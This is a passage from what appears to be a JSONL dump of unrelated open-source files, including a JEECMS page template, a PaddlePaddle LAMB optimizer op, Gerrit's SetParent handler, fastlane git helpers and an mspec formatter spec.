\n */\n @Override\n public PShape getChild(String name) {\n PShape found = super.getChild(name);\n if (found == null) {\n // Otherwise try with underscores instead of spaces\n // (this is how Illustrator handles spaces in the layer names).\n found = super.getChild(name.replace(' ', '_'));\n }\n // Set bounding box based on the parent bounding box\n if (found != null) {\n// found.x = this.x;\n// found.y = this.y;\n found.width = this.width;\n found.height = this.height;\n }\n return found;\n }\n\n\n /**\n * Prints out the SVG document. Useful for parsing.\n */\n public void print() {\n PApplet.println(element.toString());\n }\n}\n"} {"text": "\n\n\n\n${channel.title!channel.name} - ${site.name} - Powered by JEECMS\n\n\n\n\n\n\n\n\n\n\n\n\n\n[#include \"../include/页头顶栏.html\"/]\n[#include \"../include/页头导航栏.html\"/]\n
\n\t
\n \t [@cms_content_list typeId='3' styleList='3-1' titLen='20' count='5' flashWidth='355' flashHeight='273' channelId='46' textHeight='20' channelOption='1' tpl='2'/] \n
\n
\n \t [@cms_content_list channelId='46' typeId='2' titLen='10' recommend='1' channelOption='1' count='3' append='...' descLen='25']\n [#list tag_list as a]\n
\n
[@text_cut s=a.title len=titLen append=append/]
\n
\n
[@text_cut s=a.desc len=descLen append=append/]
\n
\n [/#list]\n [/@cms_content_list] \n
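 [#-- Pattern used throughout this page: [@cms_content_list .../] either renders a
      prebuilt style directly (styleList/tpl parameters) or, when given a body,
      exposes the fetched contents as tag_list, which is then iterated with
      [#list tag_list as a] and trimmed via [@text_cut/]. --]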
\n
\n \t

Video Rankings

\n \n
\n
\n
\n
\n
\n\t
\n
\n

\n [@cms_channel id='49']\n ${tag_bean.name}\n [/@cms_channel]\n

\n
\n [@cms_content_list channelId='49' typeId='2' titLen='8' channelOption='1' count='2' append='...' descLen='13']\n [#list tag_list as a]\n
\n
[@text_cut s=a.title len=titLen append=append/]
\n
\n
[@text_cut s=a.desc len=descLen append=append/]
\n
\n [/#list]\n [/@cms_content_list]\n
\n
\n \t

Hottest Videos of the Week

\n [@cms_content_list channelId='46' typeId='2' titLen='8' channelOption='1' count='4' append='...' descLen='13' orderBy='7']\n [#list tag_list as a]\n
\n \t
[@text_cut s=a.title len=titLen append=append/]
\n
\n
[@text_cut s=a.desc len=descLen append=append/]
\n
\n [/#list]\n [/@cms_content_list] \n
\n
\n
\n

\n [@cms_channel id='50']\n ${tag_bean.name}\n [/@cms_channel]\n

\n
\n \t [@cms_content_list channelId='50' typeId='2' titLen='8' channelOption='1' count='2' append='...' descLen='13']\n [#list tag_list as a]\n
\n
[@text_cut s=a.title len=titLen append=append/]
\n
\n
[@text_cut s=a.desc len=descLen append=append/]
\n
\n [/#list]\n [/@cms_content_list]\n
\n
\n
\n \t
\n [@cms_channel id='51']\n

${tag_bean.name}

More\n [/@cms_channel] \n
\n
[@cms_content_list styleList='2-2' titLen='9' count='12' rollCols='6' rollDisplayHeight='110' rollLineHeight='110' rollSpeed='18' rollSleepTime='60' rollRows='1' channelOption='1' tpl='2' rightPadding='5' topPadding='5' picHeight='110' channelId='46' typeId='2'/]
\n
\n
\n
\n
\n\t
\n [@cms_channel id='52']\n \t
${tag_bean.name}More>>
\n [/@cms_channel] \n \n
\n
\n \t
Recommended Videos
\n \n
\n
\n
\n[#include \"../include/页脚友情链接栏.html\"/]\n[#include \"../include/页脚信息栏.html\"/]\n\n\n"} {"text": "source.. = src/\noutput.. = bin/\nbin.includes = META-INF/,\\\n .,\\\n plugin.xml\n"} {"text": "TEMPLATE = app\nTARGET = test-selection\nCONFIG += qt warn_on thread c++14\nQT += widgets core gui qml quick quickcontrols2\nINCLUDEPATH += ../../src\nINCLUDEPATH += ../../QuickContainers/src\n\ninclude(../../src/quickqanava.pri)\n\nSOURCES += ./selection.cpp\nOTHER_FILES += ./selection.qml \\\n ./CustomSelectionItem.qml\n\nRESOURCES += ./selection.qrc\n"} {"text": "import * as debug from \"debug\";\nimport {COMPILER_RT_FILE, LIBC_RT_FILE} from \"speedyjs-runtime\";\nimport {execBinaryen} from \"./tools\";\n\nconst LOG = debug(\"external-tools/binaryen-s2wasm\");\nconst EXECUTABLE_NAME = \"s2wasm\";\n\n/**\n * Creates the .wast file from the given s file\n * @param sFile the s file\n * @param wastFile the name of the wast file\n * @param options options passed to s2wasm that affect the generated module\n * @return the path to the .wast file. The caller is responsible for either deleting the working directory or the returned\n * file.\n */\nexport function s2wasm(sFile: string, wastFile: string, { globalBase, initialMemory }: { globalBase: number, initialMemory: number}): string {\n LOG(`Compile ${sFile} to wast file`);\n\n const args = [\n sFile,\n \"--emscripten-glue\",\n `--global-base=${globalBase}`,\n `--initial-memory=${initialMemory}`,\n \"--allow-memory-growth\",\n \"-o\", wastFile,\n \"-l\", COMPILER_RT_FILE,\n \"-l\", LIBC_RT_FILE\n ];\n\n LOG(execBinaryen(EXECUTABLE_NAME, args));\n return wastFile;\n}\n"} {"text": "/* Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License. 
*/\n\n#include \"paddle/fluid/operators/optimizers/lamb_op.h\"\n\nnamespace paddle {\nnamespace operators {\n\nclass LambOp : public framework::OperatorWithKernel {\n public:\n using framework::OperatorWithKernel::OperatorWithKernel;\n\n void InferShape(framework::InferShapeContext* ctx) const override {\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Param\"), true,\n platform::errors::NotFound(\n \"Input(Param) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Grad\"), true,\n platform::errors::NotFound(\n \"Input(Grad) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Moment1\"), true,\n platform::errors::NotFound(\n \"Input(Moment1) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Moment2\"), true,\n platform::errors::NotFound(\n \"Input(Moment2) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"LearningRate\"), true,\n platform::errors::NotFound(\n \"Input(LearningRate) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Beta1Pow\"), true,\n platform::errors::NotFound(\n \"Input(Beta1Pow) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Beta2Pow\"), true,\n platform::errors::NotFound(\n \"Input(Beta2Pow) of LambOp should not be null.\"));\n\n PADDLE_ENFORCE_EQ(ctx->HasOutput(\"ParamOut\"), true,\n platform::errors::NotFound(\n \"Output(ParamOut) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasOutput(\"Moment1Out\"), true,\n platform::errors::NotFound(\n \"Output(Moment1Out) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasOutput(\"Moment2Out\"), true,\n platform::errors::NotFound(\n \"Output(Moment2Out) of LambOp should not be null.\"));\n\n auto lr_dims = ctx->GetInputDim(\"LearningRate\");\n PADDLE_ENFORCE_NE(\n framework::product(lr_dims), 0,\n platform::errors::InvalidArgument(\n \"The number of LearningRate shall not be 0, but received %d. Maybe \"\n \"the Input variable LearningRate has not \"\n \"been initialized. You may need to confirm \"\n \"if you put exe.run(startup_program) \"\n \"after optimizer.minimize function.\",\n framework::product(lr_dims)));\n PADDLE_ENFORCE_EQ(\n framework::product(lr_dims), 1,\n platform::errors::InvalidArgument(\n \"Learning rate should have 1 dimension, but received %d.\",\n framework::product(lr_dims)));\n auto beta1_pow_dims = ctx->GetInputDim(\"Beta1Pow\");\n PADDLE_ENFORCE_GE(framework::product(beta1_pow_dims), 1,\n platform::errors::InvalidArgument(\n \"The size of Beta1 power accumulator should be \"\n \"greater than 0, but received %d.\",\n framework::product(beta1_pow_dims)));\n auto beta2_pow_dims = ctx->GetInputDim(\"Beta2Pow\");\n PADDLE_ENFORCE_GE(framework::product(beta2_pow_dims), 1,\n platform::errors::InvalidArgument(\n \"The size of Beta2 power accumulator should be \"\n \"greater than 0, but received %d.\",\n framework::product(beta2_pow_dims)));\n\n auto param_dims = ctx->GetInputDim(\"Param\");\n if (ctx->GetInputsVarType(\"Grad\")[0] ==\n framework::proto::VarType::LOD_TENSOR) {\n PADDLE_ENFORCE_EQ(\n param_dims, ctx->GetInputDim(\"Grad\"),\n platform::errors::InvalidArgument(\n \"Param and Grad input of LambOp should have same dimension. But \"\n \"received Param dims: [%s], Grad dims: [%s].\",\n param_dims, ctx->GetInputDim(\"Grad\")));\n }\n PADDLE_ENFORCE_EQ(\n param_dims, ctx->GetInputDim(\"Moment1\"),\n platform::errors::InvalidArgument(\n \"Param and Moment1 input of LambOp should have same dimension. 
But \"\n \"received Param dims: [%s], Moment1 dims: [%s].\",\n param_dims, ctx->GetInputDim(\"Moment1\")));\n PADDLE_ENFORCE_EQ(\n param_dims, ctx->GetInputDim(\"Moment2\"),\n platform::errors::InvalidArgument(\n \"Param and Moment2 input of LambOp should have same dimension. But \"\n \"received Param dims: [%s], Moment2 dims: [%s].\",\n param_dims, ctx->GetInputDim(\"Moment2\")));\n\n ctx->SetOutputDim(\"ParamOut\", param_dims);\n ctx->SetOutputDim(\"Moment1Out\", param_dims);\n ctx->SetOutputDim(\"Moment2Out\", param_dims);\n }\n\n framework::OpKernelType GetExpectedKernelType(\n const framework::ExecutionContext& ctx) const {\n auto input_data_type =\n OperatorWithKernel::IndicateVarDataType(ctx, \"Param\");\n return framework::OpKernelType(input_data_type, ctx.GetPlace());\n }\n};\n\nclass LambOpMaker : public framework::OpProtoAndCheckerMaker {\n public:\n void Make() override {\n AddInput(\"Param\",\n \"(LoDTensor, default LoDTensor) \"\n \"Input parameter that has to be updated.\");\n AddInput(\"Grad\",\n \"(LoDTensor, default LoDTensor) \"\n \"Input gradient of the parameter.\");\n AddInput(\"LearningRate\", \"(Tensor) Learning rate.\");\n AddInput(\"Moment1\", \"(Tensor) Input first moment.\");\n AddInput(\"Moment2\", \"(Tensor) Input second moment.\");\n AddInput(\"Beta1Pow\", \"(Tensor) Input beta1 power accumulator.\");\n AddInput(\"Beta2Pow\", \"(Tensor) Input beta2 power accumulator.\");\n\n AddOutput(\"ParamOut\", \"(Tensor) Output parameter.\");\n AddOutput(\"Moment1Out\", \"(Tensor) Output first moment.\");\n AddOutput(\"Moment2Out\", \"(Tensor) Output second moment.\");\n AddAttr(\"weight_decay\", \"(float) Weight decay rate.\");\n AddAttr(\"beta1\",\n \"(float, default 0.9) The exponential decay rate for the \"\n \"1st moment estimates.\")\n .SetDefault(0.9);\n AddAttr(\"beta2\",\n \"(float, default 0.999) The exponential decay rate for the \"\n \"2nd moment estimates.\")\n .SetDefault(0.999);\n AddAttr(\"epsilon\",\n \"(float, default 1.0e-6) \"\n \"Constant for numerical stability.\")\n .SetDefault(1.0e-6f);\n\n AddComment(R\"DOC(\nLAMB (Layer-wise Adaptive Moments optimizer for Batching training) Optimizer.\n\nLAMB Optimizer is designed to scale up the batch size of training without losing \naccuracy, which supports adaptive element-wise updating and accurate layer-wise \ncorrection. 
For more information, please refer to https://arxiv.org/abs/1904.00962.\n\nThe updating of parameters follows:\n\n$$\nm_t &= \\beta_1 m_{t - 1}+ (1 - \\beta_1)g_t \\\\\n\nv_t &= \\beta_2 v_{t - 1} + (1 - \\beta_2)g_t^2 \\\\\n\nr_t &= \\frac{m_t}{\\sqrt{v_t}+\\epsilon} \\\\\n\nw_t &= w_{t-1} -\\eta_t \\frac{\\left \\| w_{t-1}\\right \\|}{\\left \\| r_t + \\lambda w_{t-1}\\right \\|} (r_t + \\lambda w_{t-1})\n$$\n\nwhere $m$ is the 1st moment, and $v$ the 2nd moment, $\\eta$ the \nlearning rate, $\\lambda$ the weight decay rate.\n)DOC\");\n }\n};\n\n} // namespace operators\n} // namespace paddle\n\nnamespace ops = paddle::operators;\nREGISTER_OP_WITHOUT_GRADIENT(lamb, ops::LambOp, ops::LambOpMaker);\nREGISTER_OP_CPU_KERNEL(\n lamb, ops::LambOpKernel,\n ops::LambOpKernel);\n"} {"text": "# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# NOTE: This file is auto generated by the elixir code generator program.\n# Do not edit this file manually.\n\ndefmodule GoogleApi.ServiceUser.V1.Model.Operation do\n @moduledoc \"\"\"\n This resource represents a long-running operation that is the result of a\n network API call.\n\n ## Attributes\n\n * `done` (*type:* `boolean()`, *default:* `nil`) - If the value is `false`, it means the operation is still in progress.\n If `true`, the operation is completed, and either `error` or `response` is\n available.\n * `error` (*type:* `GoogleApi.ServiceUser.V1.Model.Status.t`, *default:* `nil`) - The error result of the operation in case of failure or cancellation.\n * `metadata` (*type:* `map()`, *default:* `nil`) - Service-specific metadata associated with the operation. It typically\n contains progress information and common metadata such as create time.\n Some services might not provide such metadata. Any method that returns a\n long-running operation should document the metadata type, if any.\n * `name` (*type:* `String.t`, *default:* `nil`) - The server-assigned name, which is only unique within the same service that\n originally returns it. If you use the default HTTP mapping, the\n `name` should be a resource name ending with `operations/{unique_id}`.\n * `response` (*type:* `map()`, *default:* `nil`) - The normal response of the operation in case of success. If the original\n method returns no data on success, such as `Delete`, the response is\n `google.protobuf.Empty`. If the original method is standard\n `Get`/`Create`/`Update`, the response should be the resource. For other\n methods, the response should have the type `XxxResponse`, where `Xxx`\n is the original method name. 
For example, if the original method name\n is `TakeSnapshot()`, the inferred response type is\n `TakeSnapshotResponse`.\n \"\"\"\n\n use GoogleApi.Gax.ModelBase\n\n @type t :: %__MODULE__{\n :done => boolean(),\n :error => GoogleApi.ServiceUser.V1.Model.Status.t(),\n :metadata => map(),\n :name => String.t(),\n :response => map()\n }\n\n field(:done)\n field(:error, as: GoogleApi.ServiceUser.V1.Model.Status)\n field(:metadata, type: :map)\n field(:name)\n field(:response, type: :map)\nend\n\ndefimpl Poison.Decoder, for: GoogleApi.ServiceUser.V1.Model.Operation do\n def decode(value, options) do\n GoogleApi.ServiceUser.V1.Model.Operation.decode(value, options)\n end\nend\n\ndefimpl Poison.Encoder, for: GoogleApi.ServiceUser.V1.Model.Operation do\n def encode(value, options) do\n GoogleApi.Gax.ModelBase.encode(value, options)\n end\nend\n"} {"text": "//\n// FirstViewController.m\n// MBProgressHUD-JDragonDemo\n//\n// Created by JDragon on 2017/1/17.\n// Copyright © 2017年 JDragon. All rights reserved.\n//\n\n#import \"FirstViewController.h\"\n#import \n\n@interface FirstViewController ()\n\n@property(nonatomic,strong) NSArray *titleArray;\n\n\n@end\n\n@implementation FirstViewController\n-(NSArray*)titleArray\n{\n return @[@\"window加载弹窗\",@\"view加载弹窗\",@\"window展示信息\",@\"view展示信息\",@\"成功展示弹窗\",@\"警告展示弹窗\",@\"错误展示弹窗\",@\"信息展示弹窗\"];\n}\n- (void)viewDidLoad {\n [super viewDidLoad];\n UITableView *tab = [self.view viewWithTag:98];\n tab.tableFooterView = [UIView new];\n \n \n UIBarButtonItem *item = [[UIBarButtonItem alloc]initWithTitle:@\"aa\" style:UIBarButtonItemStylePlain target:self action:@selector(didClickAction)];\n \n self.navigationItem.leftBarButtonItem = item;\n \n\n // Do any additional setup after loading the view, typically from a nib.\n}\n-(void)didClickAction\n{\n NSLog(@\"dawwad\");\n}\n-(void)didaaa\n{\n NSLog(@\"dddd\");\n \n}\n-(NSInteger)tableView:(UITableView *)tableView numberOfRowsInSection:(NSInteger)section\n{\n return 8;\n}\n-(UITableViewCell*)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath\n{\n UITableViewCell *cell = [tableView dequeueReusableCellWithIdentifier:@\"cellone\"];\n cell.textLabel.text =self.titleArray[indexPath.row];\n\n return cell;\n}\n-(void)tableView:(UITableView *)tableView didSelectRowAtIndexPath:(NSIndexPath *)indexPath\n{\n switch (indexPath.row) {\n case 0:\n [MBProgressHUD showActivityMessageInWindow:nil];\n break;\n case 1:\n [MBProgressHUD showActivityMessageInView:nil];\n\n break;\n case 2:\n [MBProgressHUD showTipMessageInWindow:@\"在window\"];\n break;\n case 3:\n [MBProgressHUD showTipMessageInView:@\"在View\"];\n\n break;\n case 4:\n [MBProgressHUD showSuccessMessage:@\"加载成功\"];\n break;\n case 5:\n [MBProgressHUD showWarnMessage:@\"显示警告\"];\n break;\n case 6:\n [MBProgressHUD showErrorMessage:@\"显示错误\"];\n break;\n case 7:\n [MBProgressHUD showInfoMessage:@\"显示信息\"];\n break;\n \n default:\n break;\n }\n [self performSelector:@selector(dismiss) withObject:nil afterDelay:2];\n}\n-(void)dismiss\n{\n \n [MBProgressHUD hideHUD];\n \n}\n- (void)didReceiveMemoryWarning {\n [super didReceiveMemoryWarning];\n // Dispose of any resources that can be recreated.\n}\n\n\n@end\n"} {"text": "# extends 'profile/profile_base.html'\n# import 'macro/forms.html' as forms\n\n# block profile_content\n
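{# Profile form: CSRF token, the name field rendered through the forms.text_field macro,
   plus the shared email field partial included below. #}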
\n {{form.csrf_token}}\n {{forms.text_field(form.name, autofocus=True)}}\n # include 'user/user_email_field.html'\n\n
\n \n
\n
\n# endblock\n"} {"text": "// Copyright (C) 2012 The Android Open Source Project\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/licenses/LICENSE-2.0\n//\n// Unless required by applicable law or agreed to in writing, software\n// distributed under the License is distributed on an \"AS IS\" BASIS,\n// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n// See the License for the specific language governing permissions and\n// limitations under the License.\n\npackage com.google.gerrit.server.project;\n\nimport static com.google.common.base.Preconditions.checkNotNull;\n\nimport com.google.common.base.MoreObjects;\nimport com.google.common.base.Strings;\nimport com.google.common.collect.Iterables;\nimport com.google.gerrit.extensions.api.projects.ParentInput;\nimport com.google.gerrit.extensions.restapi.AuthException;\nimport com.google.gerrit.extensions.restapi.BadRequestException;\nimport com.google.gerrit.extensions.restapi.ResourceConflictException;\nimport com.google.gerrit.extensions.restapi.ResourceNotFoundException;\nimport com.google.gerrit.extensions.restapi.RestModifyView;\nimport com.google.gerrit.extensions.restapi.UnprocessableEntityException;\nimport com.google.gerrit.reviewdb.client.Project;\nimport com.google.gerrit.server.IdentifiedUser;\nimport com.google.gerrit.server.config.AllProjectsName;\nimport com.google.gerrit.server.config.AllUsersName;\nimport com.google.gerrit.server.git.MetaDataUpdate;\nimport com.google.gerrit.server.git.ProjectConfig;\nimport com.google.gerrit.server.permissions.GlobalPermission;\nimport com.google.gerrit.server.permissions.PermissionBackend;\nimport com.google.gerrit.server.permissions.PermissionBackendException;\nimport com.google.inject.Inject;\nimport com.google.inject.Singleton;\nimport java.io.IOException;\nimport org.eclipse.jgit.errors.ConfigInvalidException;\nimport org.eclipse.jgit.errors.RepositoryNotFoundException;\n\n@Singleton\npublic class SetParent implements RestModifyView {\n private final ProjectCache cache;\n private final PermissionBackend permissionBackend;\n private final MetaDataUpdate.Server updateFactory;\n private final AllProjectsName allProjects;\n private final AllUsersName allUsers;\n\n @Inject\n SetParent(\n ProjectCache cache,\n PermissionBackend permissionBackend,\n MetaDataUpdate.Server updateFactory,\n AllProjectsName allProjects,\n AllUsersName allUsers) {\n this.cache = cache;\n this.permissionBackend = permissionBackend;\n this.updateFactory = updateFactory;\n this.allProjects = allProjects;\n this.allUsers = allUsers;\n }\n\n @Override\n public String apply(ProjectResource rsrc, ParentInput input)\n throws AuthException, ResourceConflictException, ResourceNotFoundException,\n UnprocessableEntityException, IOException, PermissionBackendException,\n BadRequestException {\n return apply(rsrc, input, true);\n }\n\n public String apply(ProjectResource rsrc, ParentInput input, boolean checkIfAdmin)\n throws AuthException, ResourceConflictException, ResourceNotFoundException,\n UnprocessableEntityException, IOException, PermissionBackendException,\n BadRequestException {\n IdentifiedUser user = rsrc.getUser().asIdentifiedUser();\n String parentName =\n MoreObjects.firstNonNull(Strings.emptyToNull(input.parent), allProjects.get());\n validateParentUpdate(rsrc.getProjectState().getNameKey(), user, parentName, checkIfAdmin);\n 
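    // Persist the new parent: open a MetaDataUpdate on the project's repository, rewrite
    // project.config with the new parent name, commit it with the calling user as author,
    // and evict the cached project state so the change takes effect immediately.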
try (MetaDataUpdate md = updateFactory.create(rsrc.getNameKey())) {\n ProjectConfig config = ProjectConfig.read(md);\n Project project = config.getProject();\n project.setParentName(parentName);\n\n String msg = Strings.emptyToNull(input.commitMessage);\n if (msg == null) {\n msg = String.format(\"Changed parent to %s.\\n\", parentName);\n } else if (!msg.endsWith(\"\\n\")) {\n msg += \"\\n\";\n }\n md.setAuthor(user);\n md.setMessage(msg);\n config.commit(md);\n cache.evict(rsrc.getProjectState().getProject());\n\n Project.NameKey parent = project.getParent(allProjects);\n checkNotNull(parent);\n return parent.get();\n } catch (RepositoryNotFoundException notFound) {\n throw new ResourceNotFoundException(rsrc.getName());\n } catch (ConfigInvalidException e) {\n throw new ResourceConflictException(\n String.format(\"invalid project.config: %s\", e.getMessage()));\n }\n }\n\n public void validateParentUpdate(\n Project.NameKey project, IdentifiedUser user, String newParent, boolean checkIfAdmin)\n throws AuthException, ResourceConflictException, UnprocessableEntityException,\n PermissionBackendException, BadRequestException {\n if (checkIfAdmin) {\n permissionBackend.user(user).check(GlobalPermission.ADMINISTRATE_SERVER);\n }\n\n if (project.equals(allUsers) && !allProjects.get().equals(newParent)) {\n throw new BadRequestException(\n String.format(\"%s must inherit from %s\", allUsers.get(), allProjects.get()));\n }\n\n if (project.equals(allProjects)) {\n throw new ResourceConflictException(\"cannot set parent of \" + allProjects.get());\n }\n\n newParent = Strings.emptyToNull(newParent);\n if (newParent != null) {\n ProjectState parent = cache.get(new Project.NameKey(newParent));\n if (parent == null) {\n throw new UnprocessableEntityException(\"parent project \" + newParent + \" not found\");\n }\n\n if (parent.getName().equals(project.get())) {\n throw new ResourceConflictException(\"cannot set parent to self\");\n }\n\n if (Iterables.tryFind(\n parent.tree(),\n p -> {\n return p.getNameKey().equals(project);\n })\n .isPresent()) {\n throw new ResourceConflictException(\n \"cycle exists between \" + project.get() + \" and \" + parent.getName());\n }\n }\n }\n}\n"} {"text": "module Fastlane\n module Actions\n GIT_MERGE_COMMIT_FILTERING_OPTIONS = [:include_merges, :exclude_merges, :only_include_merges].freeze\n\n def self.git_log_between(pretty_format, from, to, merge_commit_filtering, date_format = nil, ancestry_path)\n command = %w(git log)\n command << \"--pretty=#{pretty_format}\"\n command << \"--date=#{date_format}\" if date_format\n command << '--ancestry-path' if ancestry_path\n command << \"#{from}...#{to}\"\n command << git_log_merge_commit_filtering_option(merge_commit_filtering)\n # \"*command\" syntax expands \"command\" array into variable arguments, which\n # will then be individually shell-escaped by Actions.sh.\n Actions.sh(*command.compact, log: false).chomp\n rescue\n nil\n end\n\n def self.git_log_last_commits(pretty_format, commit_count, merge_commit_filtering, date_format = nil, ancestry_path)\n command = %w(git log)\n command << \"--pretty=#{pretty_format}\"\n command << \"--date=#{date_format}\" if date_format\n command << '--ancestry-path' if ancestry_path\n command << '-n' << commit_count.to_s\n command << git_log_merge_commit_filtering_option(merge_commit_filtering)\n Actions.sh(*command.compact, log: false).chomp\n rescue\n nil\n end\n\n def self.last_git_tag_hash(tag_match_pattern = nil)\n tag_pattern_param = tag_match_pattern ? 
\"=#{tag_match_pattern}\" : ''\n Actions.sh('git', 'rev-list', \"--tags#{tag_pattern_param}\", '--max-count=1').chomp\n rescue\n nil\n end\n\n def self.last_git_tag_name(match_lightweight = true, tag_match_pattern = nil)\n hash = last_git_tag_hash(tag_match_pattern)\n # If hash is nil (command fails), \"git describe\" command below will still\n # run and provide some output, although it's definitely not going to be\n # anything reasonably expected. Bail out early.\n return unless hash\n\n command = %w(git describe)\n command << '--tags' if match_lightweight\n command << hash\n command << '--match' if tag_match_pattern\n command << tag_match_pattern if tag_match_pattern\n Actions.sh(*command.compact, log: false).chomp\n rescue\n nil\n end\n\n def self.last_git_commit_dict\n return nil if last_git_commit_formatted_with('%an').nil?\n\n {\n author: last_git_commit_formatted_with('%an'),\n author_email: last_git_commit_formatted_with('%ae'),\n message: last_git_commit_formatted_with('%B'),\n commit_hash: last_git_commit_formatted_with('%H'),\n abbreviated_commit_hash: last_git_commit_formatted_with('%h')\n }\n end\n\n # Gets the last git commit information formatted into a String by the provided\n # pretty format String. See the git-log documentation for valid format placeholders\n def self.last_git_commit_formatted_with(pretty_format, date_format = nil)\n command = %w(git log -1)\n command << \"--pretty=#{pretty_format}\"\n command << \"--date=#{date_format}\" if date_format\n Actions.sh(*command.compact, log: false).chomp\n rescue\n nil\n end\n\n # @deprecated Use git_author_email instead\n # Get the author email of the last git commit\n # DEPRECATED: Use git_author_email instead.\n def self.git_author\n UI.deprecated('`git_author` is deprecated. Please use `git_author_email` instead.')\n git_author_email\n end\n\n # Get the author email of the last git commit\n def self.git_author_email\n s = last_git_commit_formatted_with('%ae')\n return s if s.to_s.length > 0\n return nil\n end\n\n # Returns the unwrapped subject and body of the last commit\n # DEPRECATED: Use last_git_commit_message instead.\n def self.last_git_commit\n UI.important('`last_git_commit` is deprecated. Please use `last_git_commit_message` instead.')\n last_git_commit_message\n end\n\n # Returns the unwrapped subject and body of the last commit\n def self.last_git_commit_message\n s = (last_git_commit_formatted_with('%B') || \"\").strip\n return s if s.to_s.length > 0\n nil\n end\n\n # Get the hash of the last commit\n def self.last_git_commit_hash(short)\n format_specifier = short ? 
'%h' : '%H'\n string = last_git_commit_formatted_with(format_specifier).to_s\n return string unless string.empty?\n return nil\n end\n\n # Returns the current git branch - can be replaced using the environment variable `GIT_BRANCH`\n def self.git_branch\n return ENV['GIT_BRANCH'] if ENV['GIT_BRANCH'].to_s.length > 0 # set by Jenkins\n s = Actions.sh(\"git rev-parse --abbrev-ref HEAD\", log: false).chomp\n return s.to_s.strip if s.to_s.length > 0\n nil\n rescue\n nil\n end\n\n private_class_method\n def self.git_log_merge_commit_filtering_option(merge_commit_filtering)\n case merge_commit_filtering\n when :exclude_merges\n \"--no-merges\"\n when :only_include_merges\n \"--merges\"\n when :include_merges\n nil\n end\n end\n end\nend\n"} {"text": "# -*- coding: utf-8 -*-\nrequire File.dirname(__FILE__) + '/../../spec_helper'\nrequire 'mspec/runner/formatters/junit'\nrequire 'mspec/runner/example'\n\ndescribe JUnitFormatter, \"#initialize\" do\n it \"permits zero arguments\" do\n lambda { JUnitFormatter.new }.should_not raise_error\n end\n\n it \"accepts one argument\" do\n lambda { JUnitFormatter.new nil }.should_not raise_error\n end\nend\n\ndescribe JUnitFormatter, \"#print\" do\n before :each do\n $stdout = IOStub.new\n @out = IOStub.new\n File.stub(:open).and_return(@out)\n @formatter = JUnitFormatter.new \"some/file\"\n end\n\n after :each do\n $stdout = STDOUT\n end\n\n it \"writes to $stdout if #switch has not been called\" do\n @formatter.print \"begonias\"\n $stdout.should == \"begonias\"\n @out.should == \"\"\n end\n\n it \"writes to the file passed to #initialize once #switch has been called\" do\n @formatter.switch\n @formatter.print \"begonias\"\n $stdout.should == \"\"\n @out.should == \"begonias\"\n end\n\n it \"writes to $stdout once #switch is called if no file was passed to #initialize\" do\n formatter = JUnitFormatter.new\n formatter.switch\n formatter.print \"begonias\"\n $stdout.should == \"begonias\"\n @out.should == \"\"\n end\nend\n\ndescribe JUnitFormatter, \"#finish\" do\n before :each do\n @tally = double(\"tally\").as_null_object\n @counter = double(\"counter\").as_null_object\n @tally.stub(:counter).and_return(@counter)\n TallyAction.stub(:new).and_return(@tally)\n\n @timer = double(\"timer\").as_null_object\n TimerAction.stub(:new).and_return(@timer)\n\n $stdout = IOStub.new\n context = ContextState.new \"describe\"\n @state = ExampleState.new(context, \"it\")\n\n @formatter = JUnitFormatter.new\n @formatter.stub(:backtrace).and_return(\"\")\n MSpec.stub(:register)\n @formatter.register\n\n exc = ExceptionState.new @state, nil, MSpecExampleError.new(\"broken\")\n exc.stub(:backtrace).and_return(\"path/to/some/file.rb:35:in method\")\n @formatter.exception exc\n @formatter.after @state\n end\n\n after :each do\n $stdout = STDOUT\n end\n\n it \"calls #switch\" do\n @formatter.should_receive(:switch)\n @formatter.finish\n end\n\n it \"outputs a failure message and backtrace\" do\n @formatter.finish\n $stdout.should include 'message=\"error in describe it\" type=\"error\"'\n $stdout.should include \"MSpecExampleError: broken\\n\"\n $stdout.should include \"path/to/some/file.rb:35:in method\"\n end\n\n it \"encodes message and backtrace in latin1 for jenkins\" do\n exc = ExceptionState.new @state, nil, MSpecExampleError.new(\"broken…\")\n exc.stub(:backtrace).and_return(\"path/to/some/file.rb:35:in methød\")\n @formatter.exception exc\n @formatter.finish\n $stdout.should =~ /MSpecExampleError: broken((\\.\\.\\.)|\\?)\\n/\n $stdout.should =~ 
